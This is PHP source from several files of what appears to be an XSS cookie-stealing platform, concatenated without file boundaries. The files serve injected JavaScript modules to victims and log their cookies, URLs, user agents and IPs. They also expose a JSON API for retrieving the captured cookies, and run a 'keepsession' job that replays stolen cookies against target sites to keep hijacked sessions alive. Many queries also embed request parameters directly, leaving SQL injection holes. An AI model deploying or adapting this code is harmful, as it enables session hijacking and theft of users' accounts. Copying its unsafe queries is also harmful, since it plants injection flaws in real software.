$id = Val('id', 'GET', 1); $urlKey = Val('urlKey', 'GET'); $db = DBConnect(); $project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE id='{$id}' OR urlKey='{$urlKey}'"); if (empty($project)) { exit; } $moduleSetKeys = json_decode($project['moduleSetKeys'], true); /* 模块 begin */ $moduleIds = array(); if (!empty($project['modules'])) { $moduleIds = json_decode($project['modules']); } if (!empty($moduleIds)) { $modulesStr = implode(',', $moduleIds); $modules = $db->Dataset("SELECT * FROM " . Tb('module') . " WHERE id IN ({$modulesStr})"); if (!empty($modules)) { foreach ($modules as $module) { $module['code'] = str_replace('{projectId}', $project['urlKey'], $module['code']); //module里是否有配置的参数 if (!empty($module['setkeys'])) { $setkeys = json_decode($module['setkeys'], true); foreach ($setkeys as $setkey) { $module['code'] = str_replace('{set.' . $setkey . '}', $moduleSetKeys["setkey_{$module[id]}_{$setkey}"], $module['code']); } } echo htmlspecialchars_decode($module['code'], ENT_QUOTES); } } } /* 模块 end */
* OldCMS,site:http://www.oldcms.com */ if (!defined('IN_OLDCMS')) { die('Access Denied'); } $auth = Val('auth', 'GET'); $db = DBConnect(); $project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE authCode='{$auth}'"); if (empty($project)) { exit('Auth Err.'); } switch ($act) { case 'content': default: $domain = Val('domain', 'GET'); $where = ''; if (!empty($domain)) { $where .= " AND domain='{$domain}'"; } $contents = $db->FirstColumn("SELECT content FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC"); $data = array(); foreach ($contents as $k => $v) { $row = array(); $v = (array) json_decode($v); $row['url'] = $v['opener'] ? $v['opener'] : $v['toplocation']; $row['cookie'] = $v['cookie']; $data[] = $row; } echo JsonEncode($data); break; }
} } } /* 模块 end */ foreach ($keys as $key) { $content[$key] = Val($key, 'REQUEST'); } if (in_array('toplocation', $keys)) { $content['toplocation'] = !empty($content['toplocation']) ? $content['toplocation'] : $content['location']; } $judgeCookie = in_array('cookie', $keys) ? true : false; /* cookie hash */ $cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']); $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); if (!$judgeCookie || $cookieExisted <= 0) { //服务器获取的content $serverContent = array(); $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER']; $referers = @parse_url($serverContent['HTTP_REFERER']); $domain = $referers['host'] ? $referers['host'] : ''; $domain = StripStr($domain); $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']); $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']); $serverContent['REMOTE_ADDR'] = StripStr($_SERVER['HTTP_X_FORWARDED_FOR']); $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time()); $db->AutoExecute(Tb('project_content'), $values); } else { $db->Execute("UPDATE " . Tb('project_content') . " SET num=num+1,updateTime='" . time() . "' WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); } header("Location: {$_SERVER['HTTP_REFERER']} "); }
<?php /** * common.php 公共文件 * ---------------------------------------------------------------- * OldCMS,site:http://www.oldcms.com */ if (!defined('IN_OLDCMS')) { die('Access Denied'); } if (empty($db)) { $db = DBConnect(); } //项目 $projects = $db->Dataset("SELECT * FROM " . Tb('project') . " WHERE userId='" . $user->userId . "' ORDER BY id dESC"); foreach ($projects as $k => $v) { $projects[$k]['contentNum'] = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$v[id]}'"); } //模块 $modules = $db->Dataset("SELECT * FROM " . Tb('module') . " WHERE userId='" . $user->userId . "' OR (isOpen=1 AND isAudit=1) ORDER BY id dESC");
$code = Val('code', 'POST'); $values = array('title' => $title, 'description' => $description, 'userId' => $user->userId, '`keys`' => $keys, '`setkeys`' => $setkeys, 'code' => $code, 'isOpen' => $isOpen); $db->AutoExecute(Tb('module'), $values, 'UPDATE', " id={$id}"); ShowSuccess('操作成功'); break; case 'delete': if (!$user->CheckToken(Val('token', 'GET'))) { ShowError('操作失败'); } $id = Val('id', 'GET', 1); $db = DBConnect(); //读取module信息 $module = $db->FirstRow("SELECT * FROM " . Tb('module') . " WHERE id='{$id}' AND userId='" . $user->userId . "'"); if (empty($module)) { ShowError('模块不存在或没有权限'); } $db->Execute("DELETE FROM " . Tb('module') . " WHERE id='{$id}'"); ShowSuccess('操作成功'); break; case 'list': default: include 'common.php'; $smarty = InitSmarty(); $smarty->assign('do', $do); $smarty->assign('show', $show); $smarty->assign('url', $url); $smarty->assign('projects', $projects); $smarty->assign('modules', $modules); $smarty->display('module.html'); break; }
case 'delcontent': if (!$user->CheckToken(Val('token', 'POST'))) { ShowError('操作失败'); } $id = Val('id', 'POST'); $db = DBConnect(); $content = $db->FirstRow("SELECT pc.projectId FROM " . Tb('project_content') . " pc INNER JOIN " . Tb('project') . " p ON p.id=pc.projectId WHERE p.userId='" . $user->userId . "' AND pc.id='{$id}'"); if (!empty($content)) { $db->Execute("DELETE FROM " . Tb('project_content') . " WHERE id='{$id}'"); } echo 1; break; case 'delcontents': if (!$user->CheckToken(Val('token', 'POST'))) { ShowError('操作失败'); } $ids = Val('ids', 'POST'); $ids = explode('|', $ids); //删除 $db = DBConnect(); foreach ($ids as $id) { $content = $db->FirstRow("SELECT pc.projectId FROM " . Tb('project_content') . " pc INNER JOIN " . Tb('project') . " p ON p.id=pc.projectId WHERE p.userId='" . $user->userId . "' AND pc.id='{$id}'"); if (!empty($content)) { $db->Execute("DELETE FROM " . Tb('project_content') . " WHERE id='{$id}'"); } } echo 1; break; default: break; }
$smarty->assign('emsg', $emsg); $smarty->assign('pmsg', $pmsg); $smarty->display('user_seting.html'); exit; break; case 'submit': $db = DBConnect(); $phone = Val('phone', 'POST'); $emsg = Val('emsg', 'POST'); $pmsg = Val('pmsg', 'POST'); if (!empty($phone) && !preg_match('/^(\\d{11})$/', $phone)) { ShowError('手机格式不正确', URL_ROOT . '/index.php?do=user&act=seting', '重新填写'); } //手机验证 if ($emsg == 'on') { $emsg = '1'; } else { $emsg = '0'; } if ($pmsg == 'on') { $pmsg = '1'; } else { $pmsg = '0'; } $db->Execute("UPDATE " . Tb('user') . " SET phone='" . $phone . "',message='" . $emsg . "|" . $pmsg . "' WHERE id='" . $user->userId . "'"); ShowSuccess('修改成功', URL_ROOT . '/index.php?do=user&act=seting'); exit; break; default: break; }
<?php /** * keepsession.php keep session执行 * ---------------------------------------------------------------- */ include '../init.php'; $db = DBConnect(); $rows = $db->Dataset("SELECT * FROM " . Tb('keepsession')); $f = new SaeFetchurl(); foreach ($rows as $row) { if (time() > $row['updateTime'] + 300) { $f->setHeader("Cookie", urldecode($row['cookie'])); $con = $f->fetch($row['url']); $db->Execute("UPDATE " . Tb('keepsession') . " SET updateTime='" . time() . "' WHERE id='{$row[id]}'"); } }
<?php /** * keepsession.php keep session请求 * ---------------------------------------------------------------- */ if (!defined('IN_OLDCMS')) { die('Access Denied'); } $urlKey = Val('id', 'GET'); $url = Val('url', 'GET'); $cookie = Val('cookie', 'GET'); $db = DBConnect(); $project = $db->FirstRow("SELECT * FROM " . Tb('project') . " WHERE urlKey='{$urlKey}'"); if (!empty($project) && !empty($url) && !empty($cookie)) { $hash = md5($url . $cookie); $existed = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('keepsession') . " WHERE hash='{$hash}'"); if ($existed <= 0) { //判断用户key session的请求数量 $sum = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('keepsession') . " WHERE userId='{$project[userId]}'"); if ($sum < 10) { $sqlValues = array('projectId' => $project['id'], 'userId' => $project['userId'], 'url' => $url, 'cookie' => $cookie, 'hash' => $hash, 'addTime' => time(), 'updateTime' => time()); $db->AutoExecute(Tb('keepsession'), $sqlValues); } } }